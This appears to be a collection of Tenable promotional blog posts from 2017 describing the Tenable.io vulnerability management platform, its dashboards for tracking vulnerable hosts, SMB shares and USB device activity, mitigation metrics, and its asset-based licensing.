At Tenable, we are transforming our products and company, looking at security solutions in a new light, and developing capabilities that empower our customers with the confidence they need to embrace their future. Vulnerability and risk management are going to look very different this year.

Tenable’s strategy

Tenable has always been the leader in vulnerability management; it’s in our DNA. Today’s enterprise exposes an attack surface that looks very different than how it looked a few years ago. From BYOD to virtual systems, web apps to containers, cloud to DevOps deployments, organizations struggle to achieve visibility, to understand their true exposure, and to determine how best to manage risk.

With the unveiling of Tenable.io™, our new vulnerability management SaaS platform, a foundational building block to that future is here. Tenable.io is going to change the way you think about vulnerability management.

Tenable.io helps you understand your vulnerabilities holistically, including enterprise computing environments, mobile systems, virtual machines, web sites, web applications, containers, IoT and control systems. The strategic approach to vulnerability management brings modular applications that address your business needs for Vulnerability Management, Container Security, and Web Application Scanning.

Tenable.io enables you to leverage nearly unlimited usage of the renowned Nessus® scanners. It also includes agents, passive scanning and web app scanning technology to give you the greatest visibility into your environments. Tenable.io is the only solution to build container security into vulnerability management.

We know that it can be frustrating to assess your risk based on IP addresses when your business actually aligns with assets. At the core of Tenable.io is an asset-based understanding of your exposures and risk, not one tied myopically to IP addresses. Licensing based on assets provides simple pricing, more transparent licensing, more accurate identification of resources and more concise reports. What is an asset? An asset is simply a resource that can be analyzed. It’s that easy. Elastic asset licensing is a better foundation for a complete and accurate view of your systems and risk. And Tenable.io is the only security solution that is licensed by assets.

The Tenable.io API and SDK and the Tenable Technology Integration Partner Program also provide seamless integrations with other critical solutions in the IT environment.

Tenable.io is going to change your understanding of risk and the way you do vulnerability management.

Partners in the future

It's an exciting time in our industry. Tenable has set ambitious goals to solve some of the most foundational security challenges and empower CISOs to gain control of their expanding environments. We will be bold and we will never stop innovating. We are proud to be your strategic partner in managing risk.

So much happens at the RSA conferences, that even if you are there, you can miss some of the important messages. Not to worry, we have you covered this year. Listen as Cris Thomas (aka Space Rogue) shares the buzz from RSA USA February 2017. From trends in the security industry to news items that have impacted infosec pros, it's all here for you.

For organizations around the globe, security is evolving from a technology issue to a business issue. CEOs, board members and risk managers are asking questions and seeking solutions from their CISOs. With technologies such as IoT, cloud services, industrial control systems and DevOps in the spotlight, 2017 will be a game changing year for security.

Tenable.io, our new cloud-based vulnerability management platform, is positioned to help infosec pros transform their vulnerability management programs to better understand their exposure and gain control of risk.

Listen as five Tenable experts discuss the coming challenges and opportunities in the security industry.

Along with traditional assets, dynamic assets such as mobile devices, containers, and cloud-based solutions are changing the way organizations deal with vulnerability management. To manage these effectively, you need a streamlined way to assess your organization’s existing security posture. Leveraging Tenable.io™ enhanced vulnerability management capabilities provides a more effective way to manage assets and their vulnerabilities, and provides insight into hidden security risks enabling you to make better informed decisions to protect your organization.

Managing vulnerabilities

Tenable.io enhanced vulnerability management capabilities provides a more effective way to manage assets and their vulnerabilities

Presenting vulnerability metrics to managers and executives helps communicate the current risk exposure to an organization. As more vulnerabilities continue to be discovered, attackers are constantly looking for new ways to exploit said vulnerabilities and break into networks. Attackers often target exposed systems and attempt to exfiltrate confidential data. The result of such an intrusion could severely impact business operations. While vulnerabilities will always exist, Tenable.io helps to provide a clear strategy to assess and prioritize risks.

The Vulnerability Management Dashboard provides a new way to accurately track assets, prioritize vulnerabilities, and monitor mitigation efforts. As organizations continue to grow, vulnerabilities can span across a variety of platforms within your environment. With all of these changes, administrators can easily lose track of which systems and applications are the highest priority.

Using the Top 100 Most Vulnerable Hosts component, you can easily detect systems with the most risk, along with vulnerable and outdated software. Once these systems are identified, you can better plan mitigation strategies such as updating software, hardening systems, or implementing other mitigation methods.

Data Access Vulnerabilities

Another important aspect of vulnerability management is monitoring points where data can be accessed. The Data Access Vulnerabilities component provides you with a summary of known points where data can be exfiltrated. The Server Message Block (SMB) protocol provides the ability to share network drives, printers, and other connected devices out on the network. Having open SMB shares can enable anyone to gain access to confidential employee information, corporate trade secrets, and customer data. This information provides a starting point to identify systems where data could be at risk.

Managing sensitive information

With my background in systems administration, I know that one of the most important aspects of the job is protecting corporate data. Reducing the number of entry/exit points where data could leak can help to reduce risk. The Potential Sensitive Information component provides another way to identify potential entry/exit points where data could be accessed. Indicators will turn red when one or more systems have detected the associated activity.

To obtain additional information, you can create a targeted scan to identify hosts reporting USB device activity. Using the USB Drives Enumeration plugin (24274), you can easily keep track of any USB devices that have been connected to Windows hosts. By customizing scans to run at specific times, you can capture activity during non-business hours, or over the weekend.

This scan also provides a summary of SMB shares on Windows hosts. By default, Windows systems install a set of hidden administrative shares on systems. Additional share names can be installed on a host depending on the role of the system and software installed. In the first example below, the scan found several hosts with the “Users” network share that is known to the organization.

Scans also found another host where multiple shares are enabled, and not a part of any known network drives:

Every organization will have a different set of requirements with respect to network access and data sharing. Understanding the type of access your end users require to perform their duties is vital to understanding how to secure the file or data access points. Any misconfigurations on any shares within your environment can be exploited by attackers to gain access to critical systems or data. Using this information, you can implement additional security controls to mitigate these issues where needed.

Tracking mitigation efforts

Once the existing risk posture has been established, you can then begin to track mitigation efforts to see how well your organization is handling risk. These metrics will highlight whether current efforts are successful, or need to be improved.

The first two columns within the Track Mitigation Progress component below include a count of mitigated and unmitigated (or current) vulnerabilities per severity. The Mitigated column includes vulnerabilities that have no longer been detected by a rescan, and are assumed to be remediated. The Unmitigated column displays the number of current vulnerabilities that have not been remediated. The Exploitable column shows a percentage of critical and high severity vulnerabilities that are known to be exploitable. The Patch Available column displays the percentage of unmitigated, exploitable vulnerabilities that have had a patch available for more than 30 days. The Exploitable Hosts column displays the number of hosts on the network that have unmitigated, exploitable vulnerabilities.

Results from this component clearly show that systems are not being patched on a continuous basis, because the numbers in the Unmitigated column are higher when compared to the Mitigated column. Organizations that are patching systems on a routine basis will see an increase in the mitigated column, and a decrease in the number of vulnerabilities across the rest of the columns. This matrix provides a great example to illustrate what your organization is doing to protect corporate assets and data, and where efforts need to be improved.

Flexible licensing

Because asset data can change constantly, Tenable created an Elastic Asset Licensing model

The Tenable.io Vulnerability Management platform provides a clear and concise way to capture vulnerabilities on transient and dynamic assets. Because asset data can change constantly, Tenable created an Elastic Asset Licensing model that enables you to accurately license and track all your assets as they traverse the network. Tenable.io employs an advanced algorithm using specific attributes to track asset changes and vulnerabilities over time. This asset-based model will also allow you to recover licenses for temporary systems, and isolated assets that are scanned periodically.

Try Tenable.io

Tenable.io will provide you with accurate information on how well your organization is addressing security risks, and can help you track improvement efforts over time. If you are new to Tenable.io, you can try Tenable.io Vulnerability Management free for 60 days.